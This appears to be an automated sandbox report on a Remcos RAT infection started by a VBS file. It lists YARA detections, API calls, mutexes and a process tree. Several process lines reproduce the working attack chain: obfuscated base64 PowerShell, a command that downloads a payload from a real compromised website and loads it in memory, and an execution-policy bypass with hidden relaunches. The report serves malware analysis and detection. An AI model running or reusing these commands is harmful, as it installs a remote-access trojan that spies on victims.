                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@70/58@4/3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,27_2_00417952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,27_2_0040F474
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,27_2_0041B4A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,27_2_0041AA4A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-3PWW8O
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcroe1lr.4lx.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: sostener.vbsReversingLabs: Detection: 13%
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'Jump to behavior
